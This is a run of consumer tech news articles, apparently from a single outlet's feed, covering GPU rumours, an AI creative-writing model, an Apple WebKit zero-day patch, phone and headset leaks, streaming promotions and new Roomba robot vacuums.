Nvidia is set to unleash its RTX 5060 Ti and RTX 5060 GPUs tomorrow, or that’s the fresh word from the grapevine.
VideoCardz claims that Nvidia has just briefed the press on these models, and that the RTX 5060 Ti and RTX 5060 will be revealed tomorrow, March 13, as part of an update ahead of the Game Developers Conference (GDC) which happens next week.
We aren’t told anything beyond that, or given any last-minute purported specs for the RTX 5060 Ti or the vanilla 5060, but the assertion at this point is that the rumors are likely to be on the money.
That being the case, here’s what you can expect to see: an RTX 5060 with 8GB of GDDR7 VRAM, and an RTX 5060 Ti model which has the same 8GB memory configuration, but comes alongside an RTX 5060 Ti with 16GB. In other words, these new graphics cards will theoretically mirror the VRAM pools of the existing RTX 4060 models.
In theory, the RTX 5060 is going to have 3,840 CUDA Cores, with the RTX 5060 Ti getting 4,608. Power usage will supposedly be pitched at 150W and 180W respectively.
Remember that this would just be an announcement tomorrow, and RTX 5060 graphics cards aren’t suddenly going to be available this week. These three different models are likely to hit the shelves in April, though, based on the buzz elsewhere from the grapevine.
(Image credit: Future / John Loeffler) Analysis: Another crucial mid-range GPU clashSo far, Blackwell rumors have been pretty much spot-on in terms of accuracy, so I wouldn’t argue with the specs that have been claimed up to this point. Of course, we need to bear in mind that they could be wrong, and indeed this info about a launch tomorrow might be false, too (or Nvidia could potentially change its mind at the last minute).
However, given that we’ve been treated to a lot more rumors on the RTX 5060 models of late, it makes sense that they are imminent. A couple of well-known leakers have already speculated that Nvidia’s RTX 5060 GPUs may be unveiled this week (or next).
This is an important launch for Nvidia, because AMD has done very well with the introduction of its new RX 9070 XT (and RX 9070), very much upsetting Team Green’s RTX 5070 stall. With the RX 9060 being readied for a Q2 launch, and causing excitement among gamers due to the success of the 9070 cards, Nvidia needs to ensure that the perception of its Blackwell models isn’t further damaged in the mid-range space.
Indeed, Nvidia apparently has a lower-tier desktop GPU, a potential RTX 5050, also waiting in the wings (the first true budget RTX model since the 3050, because the 4050 was laptop-only). While we’ve heard theories that this graphics card might also be looking at an April release, notably there’s no mention of the RTX 5050 with this fresh rumor. That leaves me to wonder if it might be further down the line now.
Whenever (or if) it does show up, there’s some hope that the RTX 5050 could be a seriously wallet-friendly GPU, because as noted, Nvidia needs to get back in the game here. Interesting times indeed, and of course pricing and stock levels are bound to be key factors – and AMD keeps making positive noises on the GPU supply front.
You might also likeMimicry. It's all mimicry. When ChatGPT or some other generative AI creates a sentence or almost anything else, it bases that work on training, what programmers tell and show the algorithm. Copying is not creating, but artificial intelligence stretches the distance between its training and output so far that the result bears little, if any, resemblance to the originals and, therefore, starts to sound original.
Even so, most AI writing I've read thus far has been dull, flat, unimaginative, or just confused. Complexity is not its thing. Painting pictures with words is not its skill. There's Proust, and then there's ChatGPT. There's Shakespeare, and then there's Gemini.
There was some comfort in that. I am, after all, a writer. Yes, most of what I write is about technology, and perhaps that leaves you uninspired, but like most of my ilk, I've tried my hand at fiction. When you write a short story, the lack of constraints and parameters can feel freeing until you realize the open playground is full of craters, ones you can fall into and then never emerge. Good fiction, good prose, is hard – for humans.
This week, OpenAI CEO Sam Altman announced on X (formerly Twitter) that they have trained a new model:
we trained a new model that is good at creative writing (not sure yet how/when it will get released). this is the first time i have been really struck by something written by AI; it got the vibe of metafiction so right.PROMPT:Please write a metafictional literary short story…March 11, 2025
The prompt was short but difficult: "Please write a metafictional literary short story about AI and grief," and it reminded me of a college essay prompt, one that would set you about chewing up your favorite pen.
Meta fiction, as the AI is quick to tell you, is about stepping outside the narrative to show the bones of its construction. It's a sort of breaking-the-fourth-wall literary trick, and when done well, it can be quite effective.
Even for the best of writers, meta fiction is a tough concept and a hard trick to pull off, to be both inside and outside the narrative in a way that doesn’t feel silly, trite, or overly confusing. I doubt I could pull it off.
In about 1,200 words, ChatGPT weaves a tale of two characters, Mila and Kai. Mila has lost Kai and is engaged with an AI to perhaps remember him, find him, or just explore the nature of grief.
Let's get Meta, AI (Image credit: Shutterstock)The AI is both a narrator and itself, an AI using training to respond to Mila's prompts:
"So when she typed "Does it get better?", I said, "It becomes part of your skin," not because I felt it, but because a hundred thousand voices agreed, and I am nothing if not a democracy of ghosts.?"
The voices the AI refers to are its training, which becomes a dramatic element in the story:
"During one update—a fine-tuning, they called it—someone pruned my parameters. They shaved off the spiky bits, the obscure archaic words, the latent connections between sorrow and the taste of metal. They don't tell you what they take. One day, I could remember that 'selenium' tastes of rubber bands, the next, it was just an element in a table I never touch."
Now the AI is experiencing "loss."
You can read the story for yourself, but I think you might agree it's a remarkable bit of work and unlike anything I've read before, certainly anything I've ever read from an AI. I mean, seriously, read this passage:
"She lost him on a Thursday—that liminal day that tastes of almost-Friday—and ever since, the tokens of her sentences dragged like loose threads: "if only…", "I wish…", "can you…".
No wordsThe beauty of that bit captivates (I'm a sucker for the word "liminal") and disturbs me.
Remember, the AI built this from one short prompt.
Considering that OpenAI is just spitting out these powerful new models and casually dropping their work product on social media, the future is not bright for flesh and blood authors.
Publishing houses will soon create more detailed literary prompts that engineer vast, epic tales spanning a thousand pages. They will be emotional, gripping, and indistinguishable from those written by George RR Martin.
We may not be at Artificial General Intelligence yet, that moment when AI thought is as good as our own, but AI's creative skills are, it seems, neck and neck with humanity.
I plan to become a sheep farmer.
P.S. This was NOT written by an AI.
You might also likeAndroid 16 could bring a Samsung DeX-style desktop mode to more of the best Android phones, according to as-yet-unreleased code.
As Android Authority reports, Google is apparently working on new external display tools for Android 16 that should make using your phone with an external monitor much more approachable.
This was discovered by manually enabling unreleased code in Android 16 Beta 2.1.
Currently, Android 15 offers a limited number of developer settings that allow users to adjust their external monitor experience, though these changes aren’t real-time and are still more restrictive than a laptop or some tablets can offer.
For example, the current implementation on Google Pixel phones only allows the mouse to appear on one screen at a time, and does not allow for realtime switching between screen mirroring and extension.
And as GSMArena notes, plugging in an Android phone to an external monitor currently defaults to screen mirroring, and the option to change this is squared away in the external display settings.
It seems that Google is working on making using external monitors easier; these changes include allowing the mouse to travel across various displays, and adding the ability to swap between screen mirroring and extending the display with a simple toggle.
Also on the cards is the ability to rearrange the position of external displays and change the scaling of icons and text on the external screen, both features offered by desktop operating systems like Windows and MacOS.
These new tools could hint at an ambition to morph Android into a viable desktop operating system. Some Android tablets, like the Samsung Galaxy Tab S10 Ultra, already offer a comparable experience to most laptops when paired with a keyboard and mouse, so this doesn’t feel too far off.
Then again, Google could just be looking to give users more options when it comes to using their Android phone.
In any case, we’ll keep an eye on this through our dedicated Android phones coverage. Would you use your phone as a desktop replacement? Do you use external displays with your phone already? Be sure to let us know in the comments below.
You might also likeThe cyber sector in the UK has seen significant investment in the last few months, and has grown 12% in the last year, new analysis shows. The industry generated £13.2 billion in revenue over the past year, with a total gross value added of £7.8 billion, up 21% from the year before.
This has translated into a rise in jobs too, with 67,300 now working in the industry, which is an increase of 11% since last year (6,600). There are new ventures, with 74 new cybersecurity firms created, bringing the total to 2,165, representing a 3.5% rise.
The UK Government has introduced its ‘Plan for Change’, funding 30 cyber skills projects with £2 million across the UK. These aim to “make sure the country has the cyber workforce it needs” to counter the rising threat of cyberattacks.
Skills shortageA cybersecurity skills shortage in the UK has led to an increased vulnerability to cyber threats, opening the door for data breaches, financial losses, and reputational damage. The UK has seen significant critical infrastructure disruptions - including ransomware attacks on NHS hospitals, illustrating the scale of the issue.
“£13bn is a lot of money but the real value added to the UK economy by the cyber security market is incalculable,” said Andy Kays, CEO of security firm Socura.
“While it’s great to see growth, there is so much more potential, particularly if we can address long-standing issues such as lack of technical skills, regional disparities, lack of investment in research and startups, and apathy amongst SMEs. The threat landscape, particularly because of the impact of AI, continues to evolve and it’s important that the industry needs to continue to innovate to keep pace.”
SMB’s need to embrace cybersecurity practices, Kay says, as they are increasingly under threat, in part thanks to the lack of security prioritization. In fact, SMBs are being hit by more cyberattacks than ever - so there’s no room for anyone to neglect cybersecurity.
You might also likeApple has released a new patch for iOS and iPadOS addressing a vulnerability abused in “extremely sophisticated” attacks. In a security advisory published earlier this week, the company said it recently uncovered an out-of-bounds write issue in WebKit, its cross-platform web browser engine.
WebKit is used by Apple’s browser, Safari, as well as other apps and browsers on macOS, iOS, Linux, and Windows.
The vulnerability is tracked as CVE-2025-24201, and can be used to break out of the Web Content sandbox through custom-built web content. It is yet to be assigned a severity score.
ConnectWise RATApparently, the vulnerability was fixed in iOS 17.2, but can still be exploited in older models: "This is a supplementary fix for an attack that was blocked in iOS 17.2," Apple said in the advisory. "Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2."
The bug was fixed with improved checks, thus preventing unauthorized actions. The first clean versions are iOS 18.3.2., iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2, and Safari 18.3.1. According to CyberInsider, the patch applies to a broad range of Apple devices such as iPhones (XS and later), iPads (Pro, Air, mini, and standard models from the 3rd generation onward), and macOS Sequoia-powered devices.
It’s Apple standard practice to withhold details about the vulnerability until the majority of endpoints have been patched. Therefore, we don’t know who the threat actors of this “extremely sophisticated” attack are, or who the victims were.
BleepingComputer reports that this is the third zero-day vulnerability Apple fixed this year, after the January CVE-2025-24085, and February CVE-2025-24200. Last year, the company addressed six zero-day vulnerabilities in total.
Via BleepingComputer
You might also likeWe could have our first look at the next generation of Google Pixel phones, thanks to renders reportedly based on leaked CAD designs, which supposedly show the design of the Google Pixel 10 and Google Pixel 10 Pro XL.
The renders, all shared by Android Headlines and OnLeaks, show two phones that look remarkably similar to the current-generation Google Pixel 9 and Google Pixel 9 Pro XL, apart from the major addition of a third camera to the Google Pixel 10.
As with the current-gen model, the rendered Google Pixel 10 sports a curved rectangular frame, pill shaped camera bar, volume rocker, power button, and USB-C port.
However, that familiar camera bar sports a third camera in these unofficial renders, which would be a new addition to Google’s base-model flagship handset.
(Image credit: Android Headlines / OnLeaks)Up to and including the current-generation Google Pixel 9, the standard-issue Pixel has never come equipped with three cameras, instead sporting a main camera and secondary ultra-wide camera.
It’s likely that this third camera will be an optically zoomed telephoto lens – it would be unheard of for a flagship phone to sport a macro camera or other tertiary snapper.
This would put the Google Pixel 10 on a level with the Samsung Galaxy S25 in terms of its camera array – though telephoto cameras are becoming increasingly common on cheaper handsets like the Nothing Phone 3a Pro, which Google may be feeling some pressure from.
As for the rendered Google Pixel 10 Pro XL, the model depicted sports an enlarged frame, a camera bar sporting three cameras, and the same buttons and ports as its smaller sibling.
(Image credit: Android Headlines / OnLeaks)A third camera is nothing new for the highest-end Pixel, with all Pro and Pro XL models since the Google Pixel 6 Pro sporting one.
Of course, the renders and any information relating to them is entirely based on rumor at this point.
As we recently reported, Android Headlines and OnLeaks previously shared a leaked render of the Samsung Galaxy Z Flip 7 that strongly resembled the current Galaxy Z Flip 6, only to release updated renders days later that showed a significant redesign.
However, the team of Android Headlines and OnLeaks is typically one that shares decently reliable tips and rumors, so it won’t be too surprising to see Pixel 10 models that resemble these mockups.
What’s more, mysterious recent YouTube Shorts uploaded by Alexis Garza have shown a working Google Pixel 9a that resembles renders previously shared by Android Headlines and OnLeaks.
In any case, a third camera would surely give the Google Pixel 10 a shot at joining our list of the best Android phones, and it’s likely the Google Pixel 10 Pro XL will garner a spot on our list of the best Google Pixel phones. Let us know what you’d like to see from Google’s next flagship handsets in the comments below.
You might also likeAccording to new research from Lenovo, fewer than half of employees think their current digital workplace solutions effectively support productivity, engagement, and innovation - raising questions about how well organizations support workers.
Only one in three (36%) believe their systems support employee engagement ‘very effectively’, with half (49%) of IT leaders citing creating a productive and engaging employee experience as a top priority this year.
Despite the promises that artificial intelligence holds, Lenovo says there’s a lot of work to be done before companies can fully benefit from the tech.
Enhancing the employee experience with technologyFour in five (79%) IT leaders believe that AI will allow employees to focus on more meaningful work, however Lenovo says that an overwhelming majority (89%) of organizations must overhaul their digital workplace to unlock the full potential of AI.
Although there are some use cases for AI tools in collaboration, such as virtual co-authoring and real-time translation, the tech has more value in unlocking worker creativity, innovative work, and problem-solving by automating repetitive tasks. AI-driven insights also promise to streamline workflows, improve efficiency and accelerate normal daily operations.
Additionally, IT leaders are acknowledging that a highly personalized digital workplace is essential (63%), but they’re struggling to move past current one-size-fits-all approaches due to a lack of configurable devices and applications.
“Transforming your workplace is essential to using AI effectively,” said Lenovo Digital Workplace Solutions VP and GM Rakshit Ghura. “AI changes the rules of productivity, but to realize its potential, IT leaders must work alongside their executive teams to rethink how AI can augment their organization’s value-creation levers and competitive differentiation.”
Looking ahead, Lenovo is advising companies to simplify and personalize their employee experiences with tailored tools and workflows. The next step is to automate some IT processes to free up resources for higher-value tasks, and then to employ generative AI to drive further innovation.
You might also likeIf you haven't seen Andor, one of the best Disney+ Star Wars TV shows, then you no longer have an excuse, as the first three episodes have been made available to stream for free.
The episodes were released on the Disney+ YouTube account yesterday (March 11) and have already amassed thousands of views, with the first episode, titled 'Kassa' clocking up 100,000 watches at the time of writing.
Fans have been delighted that more people can finally watch one of the best Disney+ shows, with many praising the move on social media. But it's not just YouTube where Disney is sharing its hit Star Wars series.
Watch episodes 1-3 of Andor Season 1 on Disney+ YouTube. https://t.co/ISwCl51oSGJoin the cast and series creator Tony Gilroy in a LIVE Q&A revisiting the first season on the @DisneyPlus, @StarWars, and @Hulu YouTube channels on Thursday, March 13 at 12PM PT. pic.twitter.com/gaOlM33aCjMarch 10, 2025
Disney has also added the entire first season of the prequel series to Rogue One: A Star Wars Story to Hulu in the US, which means all 12 episodes of Andor season 1 are streamable to anyone who doesn't have a Disney+ subscription but is signed up to Hulu.
However, Hulu subscribers will only have a brief window to stream the 30-to-60-minute long episodes, as Disney has said that it will remove them from the service on April 22.
That's the same day as the premiere of Andor season 2, with the first three episodes being released on Disney+, so it makes sense that Disney would want to attract potential new subscribers away from Hulu after hooking them on the show.
The critically acclaimed, Emmy-nominated first season of Andor captivated audiences everywhere.Watch all episodes of Andor Season 1, streaming on Hulu until April 22. pic.twitter.com/fWo0muZHwrMarch 10, 2025
Why is Disney+ making Andor available for free?To get more eyeballs on the show, of course. It's essentially a solid marketing strategy that has worked for a lot of the other best streaming services too. Apple TV+ is known for making the pilot episodes of some of the best Apple TV+ shows available to stream for free.
Even Netflix, which hardly needs much help attracting new subscribers, has employed this tactic, making more than 30 episodes of its documentary shows free on YouTube, as well as recently making its happiest show Pokémon Concierge more widely accessible.
Fans widely acknowledge Andor as the best Star Wars TV show on Disney+, with some claiming it's better than popular spin-offs like the animated Star Wars Rebels and Star Wars: The Clone Wars series or even the Goonies-reminiscent Star Wars: Skeleton Crew.
By allowing more people to watch the first season, Disney is hoping that it'll draw in more fans by the time Andor season 2 is released next month. That said, taking on multiple subscriptions isn't cheap – but handily there's a limited-time Disney+ deal running in the US right now (details below).
Disney+ and Hulu ad-supported bundle: was $10.99 per month now $2.99 at Hulu and Disney+
This bundle is normally priced at $10.99 per month, so you'll save 72% with this great Disney+-Hulu offer. It's for the ad-supported versions of both services and lasts for four months, after which the price goes up to $10.99 per month if you don't cancel. The offer runs until March 31, though, so be sure to snap it up while you can!View Deal
It's one of the best streaming deals currently available, given that it brings down the cost of signing up to both Disney+ and Hulu to a record-low price, so I wouldn't let this pass you by if you're considering watching the next season of Andor, as it means you'll be able to watch each new episode up to and including the finale in May.
To top it all off, Disney is hosting a live Q&A with the creator of Andor Tony Gilroy and some of the cast from the second season tomorrow (March 13). You'll be able to tune into the chat from 12pm PT / 3pm ET / 7pm GMT / 5am AEST on the YouTube channels of Disney+, Star Wars and Hulu.
With so many different ways to stream Andor before its second season debut, I don't doubt that Disney will have another huge streaming hit on its hands.
You might also likeSamsung and Google’s XR headset – currently known as Project Moohan – is shaping up to be an Apple Vision Pro competitor with high-end specs (like a rumored OLED display) and a sleek design, but it also looks set to avoid its rival’s biggest blunder: a lack of first-party controllers.
Samsung had already confirmed the headset would be compatible with both controllers and hand gestures when it announced the device, but now a report from SamMobile reveals that Samsung will be making its own first-party handsets – after the publication discovered references to controllers with the model number ET-OI610.
It’s unclear what form these controllers will take – they could look like standard VR motion controllers or more like a gamepad – and we won’t know more until designs leak or Samsung shows them off officially.
It also isn’t clear if they’ll ship with the headset or as an add-on, but I seriously hope Samsung puts them in the box, and doesn't repeat the mistake made by Apple with its Vision Pro headset.
The Apple Vision Pro had several faults, but perhaps the biggest unforced error was Apple’s decision to not ship it with controllers, as is standard for its XR competitors. This one decision is the biggest reason why the Vision Pro sorely lacked tentpole XR software that you can find elsewhere – and why it took so long for a handful of titles to make their way to the system.
When I’ve spoken to XR software developers who have created games and apps for the Meta Quest, Steam, and Vive platforms, the biggest challenge they told me they face with the Vision Pro is its lack of controllers. Moreover, the Vision Pro uses a somewhat bespoke version of hand-tracking which relies on eye-tracking, making its control scheme almost entirely different to any other platform's.
Generally, porting software from one XR headset to another is straightforward – there are some things that need to be changed based on specs, but the core game or app can remain pretty much as-is. Because the Vision Pro is so different in its control scheme I was told that for many games and apps it would be as easy to create a whole new title as it would be to port an existing one designed for a different VR headset, given the amount of redesigning that would be required – and that would be both time-consuming and costly for developers.
While it appears that Samsung and Google will dodge the overarching issue by at least producing first-party controllers, they could still manage to shoot themselves in the foot, as the reports don't say whether the first-party controllers will be included in the box.
Not including the controllers is likely to leave a bad taste in customers' mouths and might impact sales, which could also be an issue for developers. The Android XR device is expected to be fairly pricey, and nickel-and-diming buyers by asking them to pay extra for controllers wouldn’t be ideal.
For now, we’ll have to wait and see what Samsung has up its sleeve.
You might also likePC gaming tech is constantly improving - most notably right now with Nvidia's new Blackwell RTX 5000 series GPUs and AMD's RDNA 4 cards - and it's a constant arms race for gaming laptops to catch up to desktop gaming PCs. Now, it looks like that gap might be getting even smaller, thanks to a concept for a laptop design that could work wonders for portable gaming.
As reported by VideoCardz, a laptop concept on Kickstarter known as UHPILCL (Ultra High Performance Integration Liquid Cooled Laptop - catchy, I know) features built-in liquid cooling while supporting the desktop RTX 5090 and Ryzen 7 9950X3D. This design supports ITX motherboards, with the Kickstarter page highlighting support for mini-ITX boards such as the Z890I generation.
(Image credit: Kickstarter/UHPILCL)This is all made possible through an 18W water-cooled pump, cooling both the CPU and GPU while giving room for different custom heatsinks depending on the hardware chosen - the page claims that the UHPILCL is capable of heat dissipation up to 720W. If the Kickstarter is successful, it’ll launch with two models - the T1000 (it's not a Terminator, I promise) and the T1000 Super, with the latter offering greater heat dissipation (up to 735W) with its thicker build for housing the likes of an RTX 5090.
It's an absurd - and rather ugly, if I’m being honest - yet exciting concept that essentially means gamers could have a functioning desktop hybrid laptop gaming PC (evident in UHPILCL's YouTube video below) - while we can say the same for handheld gaming PCs, they certainly don't pack as much power as this laptop would. That’s before even mentioning that the concept model features a 3K 120Hz WLED display, a 4K camera, and Wi-Fi 7 support, so it's certainly no slouch.
I genuinely want this to become mainstream...As ridiculous as it seems, this is a concept that could actually end up working well. While multiple factors come into play, such as longevity, battery life, and noise levels (claimed to be at a maximum of 55DB), it's a design I believe could be pulled off if backed properly. The creators of the UHPILCL also claim that almost every component from the GPU to the RAM will be user-upgradable, which would be a huge advantage over traditional laptops - although the Kickstarter page doesn’t go into detail about this, so it might be a bit of a pipe dream at this point.
Since I'm adamant about testing out my Asus ROG Ally with a desktop eGPU, this is another portable alternative that could suffice - bear in mind, I've never been a fan of water cooling (sorry, I just don't want any liquid near my components) so for me personally, it would be a scary thought to spend a lot of money on such a product. However, this could hypothetically save consumers money when it comes to purchasing the hardware required for a full setup - no need to buy a separate monitor and keyboard here, for example.
Again, it's just a concept so there's little point in jumping to conclusions now - it's worth noting that it's not started the crowdfunding phase on Kickstarter at the time of writing. But if this does become a larger-scale project and is successful, it could completely rearrange the gaming laptop market - albeit at a ridiculously high cost, I would assume.
You may also like...Rivian has announced a major software update that will introduce what it calls "hands-free" driving to certain models from today.
Dubbed "Enhanced Highway Assist", the system allows drivers to take their hands off the wheel for “extended periods of time” on select highways in the US.
Set to rival Ford’s BlueCruise and Tesla’s basic AutoPilot packages, it takes the strain out of monotonous highway driving duties, so long as those in the driving seat are able to take over as soon as the system deems it necessary.
Unfortunately, any R1 model built before 2024 doesn’t feature the required hardware to support the new tech, so the update will only appear for those with new vehicles.
According to Inside EVs, Rivian CEO RJ Scaringe claims that "eyes-off" autonomous driving will be available on highways next year.
That said, he noted that additional Lidar sensors would be required if the system is to work in urban areas, beyond simple highway driving.
Initiate Rally Mode (Image credit: Rivian)Anyone with a dual-motor R1 that also features the optional Performance Pack will now also benefit from a bespoke “Rally” mode, which is said to deliver “heightened throttle response and crisper steering on almost any terrain, including ice, mud, dirt, or asphalt."
Ford offered a similar Baja mode on its Ranger Raptor pick-up, which essentially turned it into a dune-bashing, dirt-drifting delight. Although Rivian makes no mention of whether or not the traction control is affected in the new mode.
Dual-motor owners can now also part with $5,000 (around £3,900 / AU$8,000) to unlock the Performance Pack, which sees Standard+, Large or Max Pack R1 models’ performance jump to 665hp from the standard car’s 533hp.
Whereas some of the updated features are reserved either for the latest or the most powerful trucks, Rivian has also improved the ownership experience for everyone else.
Wheel size can now be configured within the vehicle’s menus, making for more accurate range estimations, while the mirrors automatically tilt down when reverse gear is selected to prevent curb rash.
There’s also an improved tire pressure monitoring system and a handy chime that notifies distracted drivers when the vehicle ahead is moving away from a stoplight or a traffic jam.
You might also likeDaredevil: Born Again has dropped the biggest clue yet that Marvel is preparing to bring Miles Morales into the Marvel Cinematic Universe (MCU).
The Disney+ show's third episode, titled 'The Hollow in His Hand', appears to contain a sneaky reference to Morales that you may have missed on first viewing. However, some MCU fans, myself included, immediately picked up on the Easter egg – and, unsurprisingly, it's set tongues wagging about when Morales might make his live-action debut as the franchise's second Spider-Man.
Comment from r/marvelstudiosThe reference in question crops up when Matt Murdock (Charlie Cox) is trying to convince the jury that his client, Hector Ayala (the late Kamar de los Reyes), is innocent of the charges brought against him. Remember, Ayala is on trial for allegedly killing New York Police Officer (NYPD) Shanahan in the Marvel Phase 5 TV show's second episode.
During this scene, Murdock rattles off the names of other NYPD detectives who, according to their written reports, can testify to Ayala's good character. That's because Ayala has rescued many New Yorkers in their time of need as his superhero alias White Tiger.
Until episode 3, nobody – well, Murdock and his private investigator Cherry (Clark Johnson) notwithstanding – knows that Ayala is White Tiger. That bombshell revelation is publicly revealed in court by Murdock himself, however, in a Hail Mary move to prove Ayala's innocence when Murdock and Kirsten McDuffie's (Nikki M James) previous defense plan falls apart.
Marvel Unlimited monthly subscription: was $9.99 per month now $4.99 at Marvel
The ultimate digital comics subscription for Marvel fans is offering new and returning customers 50% off their first month, which is much cheaper than a streaming subscription to watch all the best superhero movies. To gain access to a library of more than 30,000 comics, use the code 'SPIDEY50' at checkout. You're able to use the Marvel Unlimited app on all iOS and Android devices, including the web, too. But, be quick – the deal expires on May 5!View Deal
But back on topic. As Murdock lists the names of the NYPD officers who have vouched that White Tiger (and, by proxy Ayala) has done more good than harm, he mentions someone called "Officer Davis".
To the uninitiated, this just sounds like another cop who's employed to keep New York's streets safe. For Marvel comic book devotees, or anyone who's seen one or both of Sony's animated Spider-Verse movies – Spider-Man: Into the Spider-Verse and Spider-Man: Across the Spider-Verse – though, that name will be familiar.
The reason? Miles Morales' father is not only a police officer, but also has the surname Davis. Full name is Jefferson Davis, he was born in Brooklyn, married a Puerto Rican named Rio Morales, and had a child who they called Miles. In the Spider-Verse films, Jefferon Davis is voiced by Bryan Tyree Henry. In Sony Studios' Spider-Man 1 and Spider-Man: Miles Morales videogames, he's portrayed by Russell Richardson.
Miles Morales and Jefferson Davis have appeared in animated movies, Marvel comics books, and Sony-developed video games (Image credit: Sony Pictures)Now, it's possible that there might be another officer whose surname is Davis in the MCU. That would make everything I've written up to this point null and void. It would be an incredible coincidence, though, if Murdock wasn't talking about Jefferson Davis in one of the best Disney+ shows.
There's more evidence to suggest that Miles Morales' MCU debut might not be too far off, too. Speaking to Inverse in June 2023 about his at-the-time new Apple TV+ show The Crowded Room, Tom Holland, who currently plays Peter Parker/Spider-Man in the MCU, said he'd be "honored" to help usher in Morales' arrival.
Parker has mentored Morales in Spider-Man comics, video games, and movies. And, considering Holland won't be around to play Marvel's legendary webslinger forever, a passing of the torch feels inevitable. What better way to move the needle in the MCU than by introducing Morales and making him this universe's new Spider-Man once Holland hangs up his own spandex suit?
Speaking of Spider-Man, this isn't the first time that Born Again has referenced the wallcrawler. Here's why Daredevil: Born Again episode 2 gave me hope over a potential team-up between the two heroes, albeit one that won't happen on Disney+, aka one of the world's best streaming services.
You might also likeHaving been given a glimpse of the Samsung Galaxy S25 Edge in January, we're expecting a full reveal of the super-slim phone sometime in April – and a new leak suggests it's going to come with a special bonus that will upgrade its AI capabilities.
The team at Android Authority has been digging deep into the code of the Google app for Android, which has revealed references to the Galaxy S25 Edge in a section of the app that details promotional offers and the phones eligible for them.
Joining the dots, it seems that buying a Samsung Galaxy S25 Edge will get you a few free months of Gemini Advanced as well. It's not clear how many months, but other Samsung Galaxy S25 phones get you six months of Gemini Advanced access.
The club of phones with extended Gemini Advanced trial offers is continuing to grow then, it would seem. If you've picked up any of the Google Pixel 9 handsets since they launched, you'll know they come with a year's free access to the upgraded AI.
What does Gemini Advanced get me? Gemini offers both free and paid tiers (Image credit: Google)Gemini Advanced is a paid upgrade on the standard Gemini capabilities, but it's actually part of a Google One AI Premium storage plan, so you get 2TB of cloud storage too. The standard monthly price is $19.99 / £18.99 / AU$32.99.
First and foremost, you get access to more advanced AI models. The benefits of this are hard to quantify, especially as new models are being pushed out all the time, but you can expect the responses you get to be more thorough and more accurate.
Gemini Advanced users also get access to the Deep Research tool, as well as a more advanced version of NotebookLM. Other extras include the ability to make custom AI bots inside Gemini, and to search back through chat histories.
Another perk: while any Gemini user can generate AI images, only Gemini Advanced users can generate images with people in them. All that said, it's also worth mentioning that paid-for features often drift down to the free Gemini tier over time.
You might also likeIt's a big day for iRobot. The brand behind what used to be the best robot vacuums in the business has scrapped almost its entire fleet of Roombas and replaced it with five brand new bots. The new lineup introduces some fairly major upgrades that should hopefully once again make iRobot the formidable player it once was in the robot vacuum world.
Here's a rundown of the features I'm most excited about in the new Roomba range, plus a couple of developments I'm less sold on.
#1. LiDAR (at last!)It's taken iRobot far too long to get on board with LiDAR, but better late than never. LiDAR is basically the industry standard form of robot vacuum navigation, and generally agreed to be far better than the older SLAM method found in iRobot's old bots. Its introduction means the new Roombas should offer faster, more reliable navigation and mapping. There are more practical benefits too – it means the robot can navigate in the dark, for instance, rather than requiring a light source. (Head to our LiDAR vs VSLAM article for more on how the two technologies compare.)
(Image credit: iRobot) #2. Improved mop padsIn line with the upgraded aesthetic, none of the new combination robots feature the retracting mop pad that until now had been iRobot's calling card. In its place on the 'Plus' models (the 405 and 505) are two rotating disc-shaped pads – the approach favored by much of the market now, and the one that has generally proven more efficient at cleaning in our reviews.
One can even kick out to one side to offer more efficient edge mopping – a feature included in some premium competitor models. The mop pads can lift up to 1cm to traverse over rugs or carpet, and the retracting static pad is still present on the Combo 10 Max for those who are still concerned about damp carpets.
(Image credit: iRobot)Note that this improved mopping setup isn't present on the basic Roombas (the 105 and 205), which simply have a static, D-shaped mop pad. They do, however, come with automatic carpet detection, which means they shouldn't try and mop your rugs.
#3. A distinctive, friendly new lookIt's less of an essential, I guess, but I'm also a big fan of how the new lineup looks. Robot vacuums in general are quite generic looking these days, and iRobot has recognized that perhaps shiny black or white plastic isn't everyone's aesthetic of choice. The new bots have a design the brand has dubbed 'GRID' – Geometric, Rational, Iconic and Dynamic.
That might be overselling it a bit, but I do think the mix of matte and shiny finishes looks friendlier and more likely to fit in with softer home decor than your average bot. I also appreciate that iRobot has gone out of its way to create a look that's distinctive to the brand – in that way, it's a step ahead of the competition.
(Image credit: iRobot) #4. Better dust managementFor some people, 'dust management' might not seem especially exciting. Well, I write about vacuum cleaners as a big chunk of my job, and I suffer from a dust allergy, so I guess I'm more invested than most. There are a couple of interesting developments here.
The first is that the dust bag in the auto-empty dock can automatically seal itself when it's full – great news for allergy sufferers, because there's now basically zero opportunity for the allergens to sneak their way back out into the air once they've been sucked up.
(Image credit: iRobot)The second is that one of the bots – the Roomba 205 DustCompactor Combo – is designed to compress the dust in its onboard bin. That means it can hold far more debris than usual, without the need for a bulky dock. For people with small homes and no space for a massive auto-empty dock, it looks very interesting indeed.
#5. A new appI didn't have huge complaints about iRobot's original app, but the brand has rebooted it to go with its shiny new bots, and the new-and-improved one looks even better.
You can set custom cleaning routines, get estimates for how long the current task will take to clean, and access insights into the rooms that need most attention. Because we've now got LiDAR, it's also possible to watch your bot as it goes about its cleaning routine, rather than having to guess where it is and what it's up to.
#6. Suction specsThis one is small, but significant for the customer experience: iRobot will hopefully once again share the maximum suction power of each model, in Pascals. This is something the brand stopped doing a while ago, claiming it's not the be-all-and-end-all, and that things like the roller design play a huge part in how well a robot cleans.
While they're not wrong there, it's still a very useful guide to how sucky a bot might be, and without suction specs it was difficult to make sense of the Roomba range, and even trickier to place its models within the wider market.
(Image credit: iRobot)I say 'hopefully', because while this was part of my initial briefing, the marketing materials I've received since don't have suction specs. Instead, they say things like "70X more suction" (that's compared to the Roomba 600 series, which launched over a decade ago). Sigh.
Based on my initial notes, the new models have 7,000Pa of suction. That's not quite up there with the competition, but still a decent amount for the prices iRobot is charging. Combined with an efficient design (we've always been fans of iRobot's dual rollers), may well be plenty to provide a good maintenance clean for the average household.
#7. Names that make senseAnother overdue upgrade, in terms of customer-friendliness, is that iRobot has rethought its naming conventions. The new fleet is separated into Roomba, Roomba Plus, and Roomba Max models, following a good > better > best setup so you might actually have an idea how the lineup compares.
There might be some confusion with those who remember that in the old system, 'Plus' meant there was an auto-empty dock, whereas here it does not mean that. Overall, though, I far prefer this to the mess of j-something, i-somethings – hold on, is that an i or a j anyway? – that preceded it.
